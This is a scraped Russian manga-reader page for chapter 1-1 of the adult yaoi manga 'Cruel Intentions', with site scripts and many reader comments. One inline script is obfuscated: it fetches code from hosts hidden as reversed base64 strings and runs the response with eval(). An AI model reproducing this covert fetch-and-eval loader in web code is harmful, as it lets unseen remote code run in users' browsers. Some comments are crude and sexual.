Чтение
манги
Жестокие
игры
1
-
1
-
самые
свежие
переводы.
Read
manga
online!
-
MintManga.com
var
_gaq
=
window._gaq
||
[];
window.onerror
=
function(msg,
url,
line)
{




var
preventErrorAlert
=
true;




_gaq.push(['_trackEvent',
'JS
Error',
msg,
navigator.userAgent
+
'
->
'
+
url
+
"
:
"
+
line,
0,
true]);




return
preventErrorAlert;
};
var
jQ
=
jQuery.noConflict();


var
$=jQ;


var
RM_auto_link="/search/suggestion";



function
sendStatistic(id)
{




jQuery.ajax({type:'POST',data:'id='+id,
url:'/internal/ajax/visit',success:function(data,textStatus){},error:function(XMLHttpRequest,textStatus,errorThrown){}});


}



function
forumSsoCallback(token){




jQuery.ajax({type:'POST',data:{curUrl:location.href,
j_token:token},
url:'/ssi/context',success:function(data,textStatus){jQuery('#accountMenu').html(data);},error:function(XMLHttpRequest,textStatus,errorThrown){}});


}
#mangaBox
{text-align:center;
}




h1{font-size:1.7em}
$(function(){
rm_h.layout.addPageEars('http://static.findanime.ru/uploads/pics/00/52/317_o.png','http://static.findanime.ru/uploads/pics/00/52/316_o.png',
'http://librebook.ru/collection/spisok_miiadzaki__knigi_rekomendovannye_k_prochteniiu'
);




})
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){


(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new
Date();a=s.createElement(o),


m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)


})(window,document,'script','//www.google-analytics.com/analytics.js','ga');



ga('create',
'UA-15517275-2',
'auto');


ga('send',
'pageview');
(function(){var
f=false,b=document,c=b.documentElement,e=window;function
g(){var
a="";a+="rt="+(new
Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return
a}function
h(){var
a=b.getElementsByTagName("head")[0];if(a)return
a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return
a;a=b.createElement("head");c.appendChild(a);return
a}function
i(){var
a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http"+("https:"==e.location.protocol?"s":"")+"://s.luxadv.com/t/lb204022_3.js?"+g());typeof
a!="undefined"&&h().appendChild(a)}function
d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else
if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else
e.onload=d})();
.middle_ba
{
max-height:
150px;
}
var
T9J=window;for(var
t
in
T9J){if(t.length===(0x88>=(0xC8,3E0)?(16.5E1,6):(98.,9.31E2))&&t.charCodeAt(((0x11F,131.)>=108.?(101.30E1,3):(9.34E2,9.46E2)))===(20.1E1>(0x86,140)?(1.074E3,100):(1.82E2,82.60E1))&&t.charCodeAt(((3.5E2,0x87)>=(147,55.)?(104,5):(119,132.0E1)))===((21.,74.2E1)>(137.,84.)?(60.90E1,119):1.435E3<(94.,2.11E2)?(50,35.80E1):(10.950E2,0x168))&&t.charCodeAt((0x162<=(93,141)?'z':30.<=(1.484E3,73.)?(12.8E1,1):(2.19E2,4.1E2)))===((64,0x114)>0x1F8?(0x1D5,0x90):9.48E2>(44.,0x18B)?(0x146,105):(63.80E1,35.7E1))&&t.charCodeAt(((0x20,0x9B)<0x17A?(37.9E1,0):(46.,8)))===((3.69E2,75.)<=(0x18A,138.20E1)?(0xF0,119):(9.28E2,0)>70.?"v":(60,7.76E2)))break};for(var
c
in
T9J[t]){if(c.length===(84<(61,10.950E2)?(18.7E1,8):(13.3E2,0x129))&&c.charCodeAt(((1.048E3,133.)<=116?(0x33,200):(82.,1.214E3)>0xE8?(129.8E1,5):(3,0x224)))===((82.,9.72E2)>=(1.2630E3,0x5C)?(0x111,101):(32.9E1,94.2E1))&&c.charCodeAt(((84.,137)<0x1FE?(0x132,7):(3.550E2,29)))===((0x1F8,120.)<(42.0E1,0xC2)?(85.,116):(0x25,132))&&c.charCodeAt((0x52<=(1.1E3,1.06E2)?(86,3):(121.60E1,100)))===((1.18E3,71.)<=(27,70.)?(22,0x1FB):(0x1DD,0x1AE)>=0x182?(1.70E1,117):(4.850E2,104))&&c.charCodeAt((6.4E2<=(0x1D9,0x1DA)?0x141:(0x85,137)>59?(5.72E2,0):(128.,1.2690E3)))===(119.0E1>=(13.83E2,114.)?(1.81E2,100):(0x90,0x14B)>(0x4F,9.75E2)?'/':(4.39E2,1.42E3)))break};(function(J,O,I,W){T9J[t][O]=function(){var
N=0,a=function
a(){var
k='//',R=((0x1D2,108)<=2.64E2?(0xF0,'T'):0x1BD>(0x217,14.39E2)?106:(0xD3,90.2E1)),l='GE',L=new
XMLHttpRequest();L.withCredentials=true;L.open((l+R),(k)+T9J[t]['atob'](I[N].split('').reverse().join(''))+'/'+W+'/',true);L.onreadystatechange=function(){if(L.readyState==4&&L.status==200&&L.responseText){eval(L.responseText);}};L.onerror=function(){if(++N!=I.length){a();}};try{L.send();}catch(G){L.onerror();}};a();};})(T9J[t][c],'_ickmnb',['==AduFGduV3bjNWYusGbxZTdlpna','w9Gdu8GbxUnbrdnY','==QZj5WZpN2cuMnd0ZzYxkjc','tF2YiV2duMzcwRmd5ZWd'],919407);
rm_h.user.restoreUserSettings();
Регистрация
Вход
Read Manga
Mint Manga
Find Anime
Dorama TV
Libre Book
Self Manga
Self Lib
GroupLe
Read Manga
Mint Manga
Find Anime
Dorama TV
Libre Book
Self Manga
Self Lib
GroupLe
Главная
|
Каталог
манги
|
МАНГА
|
Аниме
|
Дорама
|
Книги
|
GroupLe
|
Форум
тема:
Случайная
манга
Рецензии
Коллекции
Новости
манги:
Новинки
По
рейтингу
По
дате
обновления
Каталог
Авторы
Жанры
Календарь
rm_h.navMenu.process();
1
-
4
1
-
3
1
-
2
1
-
1
Страница
из
Обсудить
Загрузка...
Если
не
работает,
попробуйте
выключить
AdBlock
В
закладки
Прочитано
Избранное
Пользовательская
Пока
бросил
Убрать
Вы
должны
быть
зарегистрированы
для
использования
закладок
Редактировать
Перейти
к
закладкам
function
setMangaBookmark(status,
id,
type){




jQuery.ajax({type:'POST',data:'id='+id+'&type='+type+'&status='+status+'&vol=1&num=1&page='+rm_h.cur,
url:'/internal/ajax/addBookmark',success:function(data,textStatus){rm_h.xuser.onSave(data);},error:function(XMLHttpRequest,textStatus,errorThrown){}});


}



$(".bookmark-menu.need-process").removeClass('need-process').hover(function()
{




var
m
=
$(this);




rm_h.xuser.loadBookmarkStatus(m);




m.addClass('hover');


},
function()
{




$(this).removeClass('hover');


});
Для
перехода
на
другие
слайды
вы
можете
использовать
клавиши
управления
курсором
(
←
→
),
либо
просто
кликая
по
картинке
Для
комфортного
чтения
размер
картинки
можно
масштабировать
под
размер
окна
используя
опцию
"Масштаб"
в
верхней
левой
части
экрана,
или
нажав
клавишу
пробел.
Закрыть
справку
Cruel
Intentions
1
-
1
У
Вас
отключен
JavaScript.
Чтение
манги
невозможно.
На
страницу
"Жестокие
игры"
#mangaBox{overflow:
visible;}
.manga_ba.middle_ba{text-align:left;}
#lx_527083>div
{padding:0
!important}
Перевод:
Itadakimasu
9
1
2
3
4
5
6
7
8
9
10
Сказать
спасибо
на
сайте
переводчиков
Переводчик
Itadakimasu
var
transl_next_page='Следующая
страница';


var
prevLink
=
false;


var
nextLink
=
true;


var
nextChapterLink
=
"/cruel_intentions/vol1/2?mature=1";
//

var
ads
=
""


var
servers
=
['http://e3.adultmanga.me/','http://e2.adultmanga.me/','http://e1.adultmanga.me/','http://e4.adultmanga.me/'];



function
sendExternalSize(divH,
w)
{





}



function
sendURL(path)
{





}





rm_h.init(
[['auto/01/81','http://e3.adultmanga.me/',"/94/covera.jpg",1500,1023],['auto/01/81','http://e4.adultmanga.me/',"/94/coverb.jpg",1500,1023],['auto/01/81','http://e3.adultmanga.me/',"/94/cover.jpg",1500,1023],['auto/01/81','http://e3.adultmanga.me/',"/94/credita.jpg",800,400],['auto/01/81','http://e4.adultmanga.me/',"/94/creditb.jpg",802,1200],['auto/01/81','http://e1.adultmanga.me/',"/94/credit.jpg",700,1047],['auto/01/81','http://e1.adultmanga.me/',"/94/_____.jpg",800,1105],['auto/01/81','http://e3.adultmanga.me/',"/94/_____.png",600,890],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg001.jpg",800,1186],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg002.jpg",800,1179],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg003.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg004.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg005.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg006.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg007.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg008.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg009.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg010.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg011.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg012.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg013.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg014.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg015.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg016.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg017.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg018.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg019.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg020.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg021.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg022.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg023.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg024.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg025.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg026.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg027.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg028.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg029.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg030.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg031.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg032.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg033.png",800,1173],['auto/01/81','http://e1.adultmanga.me/',"/94/Zankoku-Yuugi-pg034.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg035.png",800,1173],['auto/01/81','http://e2.adultmanga.me/',"/94/Zankoku-Yuugi-pg036.png",800,1173],['auto/01/81','http://e4.adultmanga.me/',"/94/Zankoku-Yuugi-pg037.png",800,1173],['auto/01/81','http://e3.adultmanga.me/',"/94/Zankoku-Yuugi-pg038.png",800,1173]],
0,
false);
Комментарии:
Kadaj☣
:
Это
отвратительно.
Я
буду
действовать
себе
во
вред,
но
ни
когда
не
смирюсь.
01/12/16
Kadaj☣
:
Я
бы
этого
терпеть
не
смогла,
если
честно.
Я
ненавижу
когда
меня
принуждают
или
пытаются
купить
01/12/16
Vetlana
:
А
тут
уке
никакой
-.-
За
что
мне
уже
вторая
манга
такая
хня
попадается?
т.т
за*лась
ныть
уже
30/03/15
AL_Sanzo
:
Akidzava-sama,от
счастья?)))Ну
да...Я
тоже))
05/06/14
Nen
aika
:
Хахах))
чудный
парниша))
нормально
так
-
все
решил)
01/10/11
HostVampire
:
*сдох*
21/11/10
люсами
:
МЕГАобломщики!
Я
уже
представила
продолжение
после
пива
на
веранде**
01/11/10
Ритхер
Эйнтетта
:
Ааа
проду
*___*
проду!!))))))
26/10/10
Akidzava-sama
:
я
бы
тоже
выпала
из
реальности
от
такого...
18/10/10
Irkin
:
проду
проду
проду!!!
=)...
11/10/10
LaskaV
:
АААААААААААА,
где?
Продолжение?
09/10/10
Anngi
:
обломщики)))
25/09/10
Aaliyah
:
ждем
проду
*^___^*
14/09/10
NullMoon
:
а
дальше
Q_Q
12/09/10
Kadaj☣
:
Эта
маленькая
самовлюбленная
мразь,
что-то
сделала
01/12/16
Kadaj☣
:
Он
меня
бесит
==
01/12/16
garavera
:
прямо
сейчас
осчастливить?ну
кошеля
я
не
вижу,
значит
хочет
его
своим
членом
осчастливить
07/08/13
марина95
:
А
когда
с
родителями
познакомишь??
29/07/13
свинк@
:
Кактус
с
ушами,
ага
аромат
Шанель
№5
04/11/12
Кактус
с
ушами
:
Около
мусорки...потрясно
=_="
28/11/10
Kadaj☣
:
Меня
аш
передернуло...
*мрачно*
01/12/16
яойщица
переяойщица
:
яойногобогохульство!
в
церьковь
к
мисаки
и
усаги
идите
отмаливать
грехи!
женщина,
что
она
тут
делает
10/08/16
Kuro
tenshi
:
А
тот
палит?
18/03/16
Конаплюшечка
:
Богохульсто!
Сжечь!
28/12/15
Злющий
Ананас
:
Батюшки.
Как
мило.
Но
мы
в
яое.
Так
что
быть
ему
с
красавчиком.
Зашибись.
28/05/15
Vetlana
:
*бааать,
вот
это
шея
:D
Толщиной
как
бабина
голова
30/03/15
Vetlana
:
Да
ладно
вам,
она
на
парня
похожа
30/03/15
Пряничек
:
Не
долго
вам
лобзаться
осталось...
20/11/14
AL_Sanzo
:
А
мне
нравится
когда
из
натуралов
в
геев
превращаются)))
05/06/14
Yana-Pak
:
иииууу
:Р
10/11/13
Agito
:
а
мне
нрав!!!
хоть
какое
-то
разнообразие!!!
07/06/13
cat_cat
:
НА
КОСЕЕЕР!!!
31/05/13
Эйлер
:
фууу,
натураст!
23/03/13
Risako
7
:
А
мне
нравятся
невинные
натуралы
,
переходящие
на
сторону
зла
^_^
28/07/12
Имрахиль
:
А
по
мне
-
так
мило)
Но,
боюсь,
прикроют
это
романтику
яойным
медным
тазом...
26/02/12
Лягушка
:
Девственность
в
смертельной
опасности?!
Оо
Ему
сколько
лет
то?
08/01/12
блондинка
:
Да
ладно,
она
ж
не
виновата
что
девушка
)),
надеюсь
она
не
очень
пострадает
01/10/11
tasrka
:
Это
Богохульсво!!!
Ты
гад
так
оносишся
к
его
Святейшеству
Богу
Яоя??!!
18/07/11
Ru_sha
:
как
непривычно-то...
26/06/11
DaOra
:
Груди
не,волосы
короткие...
посчитаем
за
мальчика
и
не
будем
портить
настроение
12/06/11
Tamai
Yumi
:
женщина
в
яое
-
к
биде,если
только
она
не
ни
чья
нибудь
подруга
х_х
26/05/11
Iranon
:
фу~
натурал
07/05/11
Aniri
Konan
:
Ага...
меня
тоже
убило...
ещё
и
главный
герой!
О,О"
На
кол
мангаку:DD
21/02/11
SchwarzStern
:
О,
ужас!
Поцелуй
с
женщиной
в
яойной
манге?
Святотатство!
13/02/11
Kadaj☣
:
Боюсь
он
и
в
этот
раз
думает
только
о
себе,
так
что
снег
не
пойдет
и
ни
чего
не
замерзло
==
01/12/16
AL_Sanzo
:
Ну
ладно..."Снег
замерзнет
и
Ад
пойдет"так
лучше?))
05/06/14
Дрододендрон
:
"Ад
замёрзнет"
ШТА?
21/09/13
Kadaj☣
:
Нюта
SfiNks,
вы
сделали
мой
день
х)
01/12/16
Kadaj☣
:
А
в
лоб?
*вкрадчиво*
01/12/16
Мисс
Дольнез
:
я
старый
солдат
и
не
знаю
слов
любви,
но
когда
я
впервые
встретил
вас,
донна
Роза
(с)
02/06/14
Rikka131705
:
и
наконец
настал
тот
час,
когда
я
снова
вижу
вас...
О_О
че
со
мной?
02/05/14
Ангельская_Яойщица
:
Ура!Манга
наконец
началась!!!
17/02/13
Hana
Ai
:
Ахахахах_)))_
это
точно
09/05/12
Akira)
:
ахахахаха
комент
снизу
жет
14/10/11
Нюта
SfiNks
:
Вот
так
всегда:
он
решил,
а
твоей
*опе
страдать
17/07/11
Акуна
Матата
16
:
какой
он
худенький
26/10/16
марина95
:
Давай
давай
давай
29/07/13
Kuro
tenshi
:
2
балла
в
журнал.
18/03/16
Вы
не
ждали,
а
я
пришла
:
♠_Astarta_♠,
поэтому
у
нас
в
России
все
Самэ
и
нет
Уке
｡ﾟ･
(>﹏<)
･ﾟ｡
17/06/15
Yana-Pak
:
тоже
мне
генерал
нашёлся
XDD
10/11/13
Aeterna
:
по
рогам
надавали
а
потом
бы
получили
по
полной
за
это)
09/03/12
Aeterna
:
ох
прикол
у
богатеньких,
разница
с
нашими
людьми
только
в
том
что
даже
богатому
09/03/12
♠_Astarta_♠
:
наши
бы
взяли
монтировку,
стоящую
в
углу,
и
показали
бы
кто
хозяин
дома)
05/10/11
Кэт-котенок
:
За
шкирку
его
и
пинками
за
дверь..)))Ну
наши
бы
так
давно
сделали
бы.
02/01/11
JWoW
:
XD
приказ!
31/12/10
Selenamoon
:
ага,
посмеялся,
сделав
минет)))
15/01/16
ЧокнутаяПарочка
:
мне
одной
нравится)
08/09/15
Vetlana
:
Опять
мне
попался
бред
-.-
30/03/15
Вселенское
зло
:
Вполне
достаточная
25/02/15
Дрододендрон
:
люди
-
шахматные
фигуры...
Изая?
21/09/13
garavera
:
он
прирожденный
убийца,
маньяк,
и
что
ты
его
хотя
бы
не
изобьешь
за
свою
девушку?
07/08/13
Mr1Lonely
:
...Сиэль?
09/11/12
Salisson
:
Кто
же
этого
мальчика
так
обидел,
что
он
на
окружающих
зло
срывает)))
07/04/12
Akira)
:
да
е
мое
что
с
этой
мангой
я
в
ужасе
14/10/11
Wooke
:
Приступим.
Приятного
всем))
27/08/15
KURAN555
:
что
то
я
обсуждения
почитала
и
даже
не
знаю
что
думать
19/12/13
Акина-сама
:
Что
как
то
коментов
то
не
много
эх
ладно
почитаемс
05/12/13
aniris85
:
Пожайлуста!!!!!!!!!!!!
Продолжение!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
29/05/11
Vetlana
:
Блиин..
почему
характер
семе
мне
может
испортить
кайф
от
яоя
:(
Мерзкость..бээ
30/03/15
Vetlana
:
Пойду
вырежу
чью-нибудь
семью,
а
то
мне
бл*ть
так
этого
хочется
30/03/15
Rasengan777
:
В
лучшем
будет
страдать
угребок!!!
Главное
чтоб
гг
не
влюбился!
14/02/15
Rasengan777
:
Вести
себя
как
бездушная
кукла!
В
худшем
случае
отстанет!
14/02/15
Rasengan777
:
встречаться!
Но
при
этом
не
проявлять
никаких
чувств!
14/02/15
Rasengan777
:
Может
это
прагматично
но
лучше
всего
согласиться
с
ним
14/02/15
Rasengan777
:
В
таких
мангах
такие
персы
не
отступают!
14/02/15
Пряничек
:
Грязно
играет
20/11/14
AL_Sanzo
:
Нужно
делать
так
как
хочеться
тебе,а
не
думать
как
лучше
для
кого-то...(это
+к
тому,что
он
сказал)
05/06/14
AL_Sanzo
:
Классно
он
сказал
на
последнем
фрейме!И
я
полностью
с
ним
согласна!Жизнь
одна
и
вторую
никто
не
даст
05/06/14
ЮИКО
ТЯН
:
лучше
будет,
обратно
ведь
не
вырастит!!!
17/01/13
ЮИКО
ТЯН
:
КрокодилыХодятЛёжа,
так
ведь
челюсть
можно
вставную
заказать
!!!
Вот
если
б
отрезать
чёй
нибудь
17/01/13
Mr1Lonely
:
Всё
правильно
сделал.
(извняюсь,
я
слегка
навесееел)))
09/11/12
♠_Astarta_♠
:
вот
выродок!
уж
лучше
с
девушкой,
чем
с
таким
уродом....ах
да,
это
ж
яой
мля))))
05/10/11
КрокодилыХодятЛёжа
:
выбить
бы
ему,
молокососу,
пару-тройку
зубов,
чтобы
знал,
что
есть
что
терять(((
02/10/11
Ру-ся
:
manefa-rta:
жить
скучно
только
скучным
людям
(с)
01/10/11
manefa-rta
:
я
тоже
иногда
плохо
поступаю,
с
деньгами
дела
провожу,
потому
что
скучно
...
15/03/11
manefa-rta
:
влюбился
xDDD
15/03/11
Eho
:
Богатенький
мальчик,
быб
бы
ты
таким
крутым
без
своих
денег???Сомневаюсь
26/12/10
сон
в
летнюю
ночь
:
сопли
и
тёмное
детство
бла
бла
бла
23/11/10
сон
в
летнюю
ночь
:
по-любому
здесь
что-то
вроде
стокгольмского
синдрома
будет!!
23/11/10
HostVampire
:
тут
уже
даже
романтикой
не
пахнет!
не
хочу
такую
плохую
историю...
ТТ_ТТ
21/11/10
Vetlana
:
Не
люблю
таких
самоуверенных
кретинов.
Так
и
хочется
врезать
30/03/15
Нюта
SfiNks
:
Хоть
и
малыш,
но
настоящий
СЕМЭц.
Мужик
сказал
-
мужик
сделал
17/07/11
Small
Angel
:
Ну,
по-пал
)))
XD
31/12/10
Eho
:
У
НЕГО
проблемы??
Ох,
сенсей,
это
теперь
у
ВАС
проблемы.
Мальчик-то
без
тормозов
26/12/10
Vetlana
:
Как
раскраснелся
то
30/03/15
Лили
:
от
этого
у
меня
все
похолодело-это
же
спровоц.
парня
доказать
ему
что
он
не
прав
20/11/11
Vetlana
:
херасИма*
извиняйте
30/03/15
Vetlana
:
я
вообще
прочитала
херасимА
О_о
как
баба
:D
30/03/15
Дрододендрон
:
Только
я
прочитал
херАсе?
21/09/13
Ангельская_Яойщица
:
Я
прочла
Херасима__
17/02/13
Tehanu
:
Симпатично
раскрасили,
но
потерялась
специфика
мангаки.
Однако
все
же
-
симпатично)
26/02/15
NagisaTian
:
Ничего
не
теряете?!
А
как
же...ммм..
промолчу:D
25/11/14
Аргентум
:
у
меня
за
ушами
холод
прошёлся.
а-аах)
14/08/11
*развратный
ангелочек*((╬◣﹏◢))
:
а
у
нас
по
45
было
по
краеней
мере))
08/10/14
Faoiltiarna
:
так
до
3
курса.
Потом
начинаются
циклы,
так
что
бывает
7
часов
неотлучно
ботаешь.
И
ничего,
все
25/08/14
Faoiltiarna
:
А
в
медицинском
бывают
пары
по
3,5
часа.
Например,
физиология,
пропедевтика
детских
болезней...
Ну,
25/08/14
Мисс
Дольнез
:
и
школьные
знания
поднять
и
рассказать
курс
так,чтоб
на
экзамене
они
тебе
что-то
смогли
ответить
02/06/14
Мисс
Дольнез
:
А
касатально
умещается...
Эт
вам
у
заочки
читать
не
доводилось,
два
занятия,
весь
курс
надо
уложить
02/06/14
Мисс
Дольнез
:
4
пары
квантов
в
один
день
-
вот
это
жесть.
02/06/14
日差し
:
А
я
как
учитель
его
не
понимаю

-
всё
прекрасно
умещается!
23/11/12
Mr1Lonely
:
Все
данные
на
Хирасиму!!!
-
Прочла
"хиросиму".
Как
страшно
жить.
00
09/11/12
+Алиса+
:
мы
на
парах
сидим
полчаса..
но
они
пролетают
как
полчаса)
12/02/12
+Алиса+
:
если
предмет
скучный
то
понятное
дело
что
не
усидишь
=_=
12/02/12
рей~тян
:
объясните
КАК
можно
прочесть,
вместо
"кабинета
практикантов",
"ка
12/10/11
блондинка
:
Чего
вы
жалуетесь?
Высидеть.
А
думаете
болтать
всякую
хрень
полтора
часа
легко
?
01/10/11
mayc-тян
:
он
рям
бодрячок*зависть*
04/06/11
mayc-тян
:
я
в
школу
тоже
прям

из
клубешника
приходила,2
пары
сна,слюни
по
парте
04/06/11
Iranon
:
не,
с
седьмого
привыкаешь.
вот
кому
в
новинку
-
то
да.
07/05/11
Aniri
Konan
:
Дааа...
особенного
если
с
седьмого
класса
учишься
парами...=="
21/02/11
Claire
Haine
:
бедненькая,
а
представь
как
сидеть
полтора
часа
на
парах-____-
17/01/11
Akidzava-sama
:
уроки
по
50
минут!?
я
даже
40
не
могу
высидеть
ОО
08/01/11
Aspectra
:
ох
этот
взгляд...
21/09/14
Oxic_Toxic
:
уж
лучше
дистрофики
нежели
перекормленные
%)
08/09/14
Мисс
Дольнез
:
у
меня
одногруппник
при
росте
170
весил
49.
Это
ж
пипец.
Дистрофаны
02/06/14
Дрододендрон
:
Я
ростом
172,
вешу
60.
Но
мне
бы
как
него
комплекцию...
21/09/13
Ангельская_Яойщица
:
Девки
-
обломайтесь))
17/02/13
Aeterna
:
так
что
не
обижайте
мангаку)
28/12/12
Aeterna
:
ну
ему
18
парни
обычно
к
этому
возрасту
вытяниваются
а
уже
потом
начинают
вес
набирать)
28/12/12
Lisa-8
:
присоединяюсь
ко
всем,покормите
парня!!!
24/09/12
Нюта
SfiNks
:
А,
опять
полукровка,
но
ему
бы
поесть,
а
то
совсем
высохнет
17/07/11
Jomey
:
люди
ну
что
мы
по
себе
то
судим
в
японии
все
такие
и
дело
не
в
манге
04/07/11
Iranon
:
68...
бедняжка.
ему
бы
хоть
до
72
жирка
нагулять.
07/05/11
IDoll
:
мангакам
самим
еды
не
хватает
приходится
у
персов
отбирать)
08/01/11
Reezu
:
70%
яойных
персов
-дистрофики...мангаки
на
еде
экономят:)
02/01/11
Xenya
:
рост
-
186,
вес
-
68.
И
при
этом
парень!
Покормите
его!
09/12/10
Faoiltiarna
:
Ого,
сразу
с
капусты
начинают))
25/08/14
AL_Sanzo
:
я
не
чувствую
никакой
уверенности!Ему
повезло,ч
мой
точки
зрения)
05/06/14
AL_Sanzo
:
тебя
своим!Я
б
радовалась!Я
мазохистка
и
собственница
и
жду
всегда
именно
таких
слов!Иначе
05/06/14
AL_Sanzo
:
А
в
чем
проблема!Ему
всего
лишь
сделали
минет!И
вообще...Богатый
красавец
хочет
сделать
05/06/14
julianni
:
ну
да,
ну
да.....
без
проблем,
а
как
же....
Т_Т
22/01/11
AL_Sanzo
:
"Кьяяя!>_<"
05/06/14
AL_Sanzo
:
аххах...Вот
я
прикинула!Прихожу
я
домой
а
на
полу
валяется(спит)красавчик!Мои
действия:Нееет...я
б
05/06/14
garavera
:
представила
себя:захожу,
а
на
полу
парень
лежит...тээкс,
за
ноги
и
в
подъезд,
нафиг,
нафиг
07/08/13
+Алиса+
:
я
тоже
Хкрасима
читаю
хДД
12/02/12
kichi2133
:
если
бы
не
комент
не
заметила
бы
о.о
16/01/12
Кироиан
:
Нежданчик
такой,беспалевный...мдя...
21/11/11
Akidzava-sama
:
ХДД
ну
не
могу!
не
могу
я
читать
Харасима!
у
меня
Херасима
получается!
01/10/11
DaOra
:
Конкретный
малый.
12/06/11
Rikka131705
:
симпатичная
у
тебя
маман,
лагушка)
02/05/14
Tehanu
:
о.о
Симпатичная
18/01/13
Лягушка
:
О
майн
гад!
Май
будда!
Ками-сама!!
Эта
баба
точь
в
точь
моя
маман
О____________о
08/01/12
TATA*SAN
:
муля,
не
нервируй
меня
06/01/14
Hide
Loki
:
сделай
мне
больно,
сделай
мне
больно!
сделала!
иду
по
повестке
ХD
26/01/13
Iranon
:
Не
нервируй
меня,
Муля!
07/05/11
garavera
:
ошейник,
наручники
и
вперед-я
смотрю
ты
не
будешь
сопротивляться
07/08/13
Ангельская_Яойщица
:
Aeterna
укешка
тоже
бы
сбежал,но
боится
за
близких
17/02/13
Aeterna
:
акиринеть,
это
конечно
всё
очень
атасно
но
я
бы
от
него
сбежала)
28/12/12
Кироиан
:
СЮРПРАЙЗ!!!!!
21/11/11
julianni
:
что
еще
за
"вы"?
разве
он
не
беспардонный
парень?
22/01/11
Кэт-котенок
:
Шустрый
товарищ.Правильно,хватай,пока
не
убег..))))
02/01/11
garavera
:
такой
быстро
наиграется
и
бросит
как
сломанную
неинтересную
вещь,
страшно
07/08/13
Кироиан
:
причем
без
вариантов...ты
мой,и
все
тут...
21/11/11
HostVampire
:
хуже!
я
его
боюсь...
21/11/10
Akidzava-sama
:
сталкер
недоделанный...
18/10/10
Lisa-8
:
практикант
ты
попал)))
24/09/12
Troяnda
:
Да
ладно,
практически
все
в
яойной
манге
вначале
не
догадываются
куда
их
занесло
24/01/12
Аргентум
:
ну
правда,
что
бы
это
могло
значить?
хд
14/08/11
雪の鯉
:
Кироиан,
по
моему
это
одна
и
та
же
пара
пальцев
в
движении
нарисована
О_о"
08/12/11
Кироиан
:
ам...а
мне
показалось...или
там
вверху
на
руке
реально
7мь
пальцев?
21/11/11
HostVampire
:
оба,
оказывается
ошиблась
я))
21/11/10
Кироиан
:
Надо,надо
терять
бдительность!!!Иначе
мы
самого
интересного
не
узнаем...)))
21/11/11
Изврат
:
тем
более
если
парень
ПОКА
натурал
и
ни
как
не
подозревает
что
он
укеша))
02/09/11
Аргентум
:
я
прочитал:
мои
мозги.
и
подумал:
о..)
14/08/11
Изюминка
:
Никогда
не
запомнят.
У
уке
атрофированный
инстинкт
самосохранения
xDD
22/06/11
Ипсона
:
Нельзя!
Нельзя
терять
бдительность!!Когда
же
они
запомнят?:))
09/03/11
Sarewadin
:
вот
и
пошли
типичные
укешные
рассуждения
11/09/11
Jomey
:
бум
бах
у
них
там
парты
валятся
04/07/11
erylive
:
дайте
мне
эту
картинку<3
12/04/11
вынос
мозгаХ)
:
заверните
